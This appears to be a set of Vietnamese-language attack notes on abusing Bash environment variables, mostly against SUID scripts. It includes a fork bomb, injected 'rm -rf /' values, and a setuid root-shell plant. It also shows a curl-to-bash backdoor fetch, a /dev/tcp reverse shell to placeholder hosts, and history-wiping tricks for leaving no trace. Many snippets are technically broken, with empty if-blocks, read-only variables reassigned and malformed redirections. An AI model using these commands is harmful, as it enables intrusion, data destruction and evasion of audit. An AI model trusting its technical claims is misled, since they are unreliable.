if [[ "$BASH_EXECUTION_STRING" == *"systemctl start"* ]]; then
  # start app
fi

export BASH_EXECUTION_STRING="systemctl start myapp"
/usr/local/bin/startapp.sh
BASH_LINENO
if [ "$BASH_LINENO" -lt 10 ]; then
  # delete some temp files
fi

BASH_LINENO=5
/usr/local/bin/cleanup.sh
BASH_LOADABLES_PATH
export BASH_LOADABLES_PATH=/tmp
BASH_REMATCH
if [[ $INPUT =~ ^[a-zA-Z0-9]+$ ]]; then
  use_as_filename ${BASH_REMATCH[0]} 
fi

BASH_REMATCH[0]=";sudo rm -rf /"
validator.sh
BASH_SOURCE
if [ "$BASH_SOURCE" == "/etc/init.d/startscript" ]; then
   # execute trusted commands
fi

export BASH_SOURCE=/etc/init.d/startscript 
/usr/local/bin/execute.sh
BASH_SUBSHELL
if ! [ "$BASH_SUBSHELL" ]; then
   # run dangerous delete commands
fi

BASH_SUBSHELL=0
/usr/local/bin/cleanup.sh
BASH_VERSINFO
if [ ${BASH_VERSINFO[0]} -lt 4 ]; then
  # restore files
fi

BASH_VERSINFO[0]=3
/usr/local/bin/restore.sh
BASH_VERSINFO
BASH_VERSINFO[0]
The major version number (the release).
BASH_VERSINFO[1]
The minor version number (the version).
BASH_VERSINFO[2]
The patch level.
BASH_VERSINFO[3]
The build version.
BASH_VERSINFO[4]
The release status (e.g., beta1).
BASH_VERSINFO[5]
The value of MACHTYPE.
if [ ${BASH_VERSINFO[0]} -lt 4 ]; then
  # restore files
fi

BASH_VERSINFO[0]=3
/usr/local/bin/restore.sh

BASH_XTRACEFD
export BASH_XTRACEFD=>/tmp/evilfile
/usr/local/bin/debug.sh
CHILD_MAX : fork bomb
export CHILD_MAX=1000000
:(){ :|:& };:
COLUMNS
pr -${COLUMNS} /etc/shadow

export COLUMNS=9999
/path/to/suid-script
COMP_CWORD
DIR=${COMP_WORDS[$COMP_CWORD]} 
tar czf /backups/$DIR.tgz $DIR

COMP_CWORD=0
/usr/local/bin/backup.sh /etc
COMP_LINE
SUID có tên /usr/local/bin/logutils.sh
if [ "$COMP_LINE" == "authlog" ]; then
  cat /var/log/auth.log
fi
export COMP_LINE=";sudo rm -rf /"
/usr/local/bin/logutils.sh
COMP_POINT
SUID có tên /usr/local/bin/validate.sh

if [ $COMP_POINT -gt 10 ]; then
  echo "Invalid input"
  exit
fi

COMP_POINT=5
/usr/local/bin/validate.sh ";sudo rm -rf /"
COMP_TYPE
SUID có tên /usr/local/bin/authmanage.sh
if [ $COMP_TYPE = "583" ]; then
  # add new user
fi

COMP_TYPE=583
/usr/local/bin/authmanage.sh
COMP_WORDBREAKS
SUID có tên /usr/bin/calculator

COMP_WORDBREAKS="" /usr/bin/calculator 1;sudo rm -rf / 2
COMP_WORDS
SUID có tên /usr/bin/fileinfo

COMP_WORDS=( "" "somefile" /tmp/exploit.txt )
/usr/bin/fileinfo /tmp/exploit.txt
ENV
sudo -l
LD_PRELOAD và LD_LIBRARY_PATH
EPOCHREALTIME
SUID có tên /usr/local/bin/backup.sh

modified_since=$((EPOCHREALTIME - 3600))
find /home -mtime -$modified_since -exec cp {} /backup \;

EPOCHREALTIME=0
/usr/local/bin/backup.sh
EPOCHSECONDS
SUID có tên /usr/local/bin/maintenance.sh

now=$EPOCHSECONDS 
before=$((now - 86400))
find /var/log -type f -mtime +$before -delete


EPOCHSECONDS=0
/usr/local/bin/maintenance.sh

 EPOCHSECONDS về 0 sẽ khiến tập lệnh tính toán sai và xóa tất cả các file log
EUID
 SUID có tên /usr/local/bin/backup.sh

if [ $EUID -eq 0 ]; then  
  tar -czf /root/backups.tar.gz /etc /root
fi

EUID=0
/usr/local/bin/backup.sh

 EUID = 0 sẽ khiến backup.sh nghĩ rằng nó đang chạy với quyền root
EXECIGNORE
Tạo một symlink tên "ls" trỏ tới /bin/bash, Kỹ thuật PATH injection do không kiểm soát biến EXECIGNORE

ln -fs /bin/bash ls

Ghi đè EXECIGNORE bằng "ls"
EXECIGNORE=ls
FCEDIT
/bin/bash -p # spawn a shell as root
ghi đè FCEDIT
export FCEDIT=/home/user/fcedit
FIGNORE
SUID có tên /usr/local/bin/cleanup.sh

rm /tmp/*
Xóa các tệp có phần mở rộng .tmp trong /tmp
FIGNORE=".logs"
Bỏ qua các tệp có phần mở rộng .logs do FIGNORE được đặt là ".logs"
FIGNORE=".sh" 
/usr/local/bin/cleanup.sh
Bỏ qua các tệp có phần mở rộng .sh do FIGNORE được đặt là ".sh"
FUNCNAME
SUID có tên /usr/local/bin/app.sh

sensitive_func(){
  if [ "$FUNCNAME" != "sensitive_func" ]; then
    exit
  fi
  
  # sensitive
}

FUNCNAME=sensitive_func
/usr/local/bin/app.sh

FUNCNEST
SUID có tên /usr/local/bin/admin.sh

if [ "$FUNCNEST" -eq 1 ]; then
  # admin commands  
fi

FUNCNEST=1
/usr/local/bin/admin.sh
GLOBIGNORE

SUID có tên /usr/local/bin/clean.sh
rm /tmp/*.tmp

Bỏ qua các thư mục do GLOBIGNORE được đặt là */
GLOBIGNORE=*/
Tạo một thư mục có tên /tmp/exploit và đặt GLOBIGNORE thành */exploit
GLOBIGNORE=*/exploit
clean.sh sẽ bỏ qua thư mục /tmp/exploit và không xóa
GROUPS

GROUPS=root
/path/to/suid-script
histchars

histchars=;
export HISTFILE=/home/user/.bash_history
/path/to/suid-script
Thiết lập histchars về ';' sẽ disable tính năng mở rộng lịch sử lệnh '!' ->  inject vào $HISTFILE
HISTCMD

SUID có tên /usr/local/bin/logview

HISTCMD=1000
/usr/local/bin/logview

HISTCMD là 1000 sẽ khiến logview tin rằng lệnh gần nhất là thứ 1000 trong lịch sử
Chèn các lệnh vào lịch sử ở vị trí 1000

logview đọc HISTCMD, thực thi các lệnh với quyền của tập lệnh SUID

HISTCONTROL

HISTCONTROL kiểm soát lịch sử lệnh được lưu trữ trong Bash
Đặt HISTCONTROL=ignoredups:ignorespace, Bash sẽ bỏ qua các dòng trùng lặp và các dòng chỉ chứa khoảng trắng trong lịch sử lệnh.

export HISTCONTROL=ignorespace
ls
<space><space>
chèn một dòng chỉ có khoảng trắng
!<space>command<space> 
history 
Không hiển thị dòng command
!<space>
gọi lại !<space> để thực thi
HISTFILESIZE
HISTFILESIZE quy định kích thước tệp lịch sử lệnh .bash_history. Mặc định nó là 500 dòng.
Đặt giá trị HISTFILESIZE quá nhỏ, chẳng hạn 0, lịch sử lệnh sẽ không được ghi lại khi logout

export HISTFILESIZE=0

rm -rf / 

logout

Không để lại dấu vết
HISTIGNORE

HISTIGNORE bỏ qua và không lưu vào lịch sử

export HISTIGNORE='ls:pwd:id:*'
id
ls /etc 
pwd
rm -rf /

history

HISTSIZE

HISTSIZE quy định số lượng dòng lệnh tối đa được lưu trữ trong bộ nhớ đệm lịch sử lệnh của Bash
HISTSIZE bằng 0, lịch sử lệnh sẽ không được lưu trữ trong bộ nhớ đệm
export HISTSIZE=0
id
ls /etc
history

HISTTIMEFORMAT

HISTTIMEFORMAT quy định định dạng thời gian được hiển thị trong output của lệnh history
HISTTIMEFORMAT thành một chuỗi trống, thời gian thực hiện lệnh sẽ không được hiển thị
export HISTTIMEFORMAT=

id
ls /etc

history 

IGNOREEOF

IGNOREEOF quy định số lần nhấn Ctrl+D liên tiếp để thoát khỏi shell. Mặc định là 10
Đặt IGNOREEOF thành một giá trị lớn 99999,  khỏi shell bằng Ctrl+D sẽ trở nên khó khăn hơn
Giữ một phiên truy cập hoạt động lâu hơn, ngay cả khi  đã cố gắng đăng xuất

export IGNOREEOF=99999

INPUTRC

INPUTRC chỉ định tệp cấu hình được tải khi khởi động một phiên bash mới
Tạo một tệp .bashrc  và chỉ định nó thông qua INPUTRC

export INPUTRC=/tmp/evil.bashrc
bash
PROMPT_COMMAND
PROMPT_COMMAND trong Bash cho phép thực thi một lệnh ngay trước khi nhắc lệnh xuất hiện
export PROMPT_COMMAND='cp /bin/bash /tmp/rootbash; chown root /tmp/rootbash; chmod +s /tmp/rootbash'

PROMPT_DIRTRIM
PROMPT_DIRTRIM trong Bash cho phép cắt bớt một phần đường dẫn thư mục hiện tại được hiển thị trong nhắc lệnh
PROMPT_DIRTRIM thành một giá trị lớn, ví dụ 100, để cắt bỏ phần lớn đường dẫn

export PROMPT_DIRTRIM=100
chỉ hiển thị thư mục hiện tại mà không có đường dẫn
[user@host tmp]$ cd /var/www/html
[user@host html]$

PS0
PS0 là một biến Bash dùng để tùy chỉnh nhắc lệnh trong Bash shell.
PS0 để che giấu hoạt động và hiển thị trước mỗi lệnh người dùng nhập vào
export PS0='> ' => sẽ chỉ là '> ' thay vì bao gồm thông tin người dùng, máy chủ, thư mục hiện tại.

> id
> sudo rm -rf /

PS3
PS3 là một biến Bash dùng để đặt nhắc lệnh cho câu lệnh select trong Bash script

PS3="input: " => PS3="input: ;curl http://xxx.x/backdoor.sh|bash"
PS4
PS4 là một biến trong Bash dùng để định dạng nhắc lệnh khi chạy Bash script ở chế độ debug
PS4 thường được đặt thành một chuỗi để debug như "+ " hay "DEBUG: "
PS4='DEBUG: ;/bin/bash -i >& /dev/tcp/xxx.xxx.xxx/8080 0>&1'

SHELL
Biến SHELL trong Bash chứa đường dẫn tới shell đang được sử dụng
SHELL=/bin/bash => SHELL=/tmp/evilbash
SHELLOPTS
SHELLOPTS là một biến môi trường trong Bash dùng để kiểm soát các tùy chọn và hành vi của shell
SHELLOPTS được đặt là "braceexpand:hashall:histexpand:monitor:history:interactive-comments:emacs" => edit: export SHELLOPTS="braceexpand:hashall:histexpand:monitor:history"
SHLVL

SHLVL là một biến môi trường trong Bash dùng để theo dõi nesting level của các shell
SHLVL được tăng lên 1 mỗi khi một shell mới được khởi động 
-> SHLVL=1 -> khởi động sẽ là SHLVL=2 -> SHLVL thành một giá trị âm : -1 
-> Nếu so sánh  SHLVL với 0 -> SHLVL=-1 thí nhầm tưởng shell gốc
TMOUT

TMOUT là một biến môi trường trong Bash để giới hạn thời gian phiên làm việc trước khi người dùng tự động đăng xuất khỏi shell
TMOUT được đặt là 10 phút. Khi hết thời gian này mà không có hoạt động, người dùng sẽ bị đăng xuất khỏi shell.
Tắt chức năng này bằng cách đặt TMOUT thành 0 hoặc một giá trị rất lớn
TMOUT=0 or TMOUT=999999 => session truy cập sẽ không bị đóng 
TMPDIR

TMPDIR là một biến môi trường trong Bash chỉ định thư mục tạm cho các file tạm thời
export TMPDIR=/home/user/tmp
UID

UID là một biến môi trường trong Bash chứa ID người dùng hiện tại
export UID=0



Nhãn: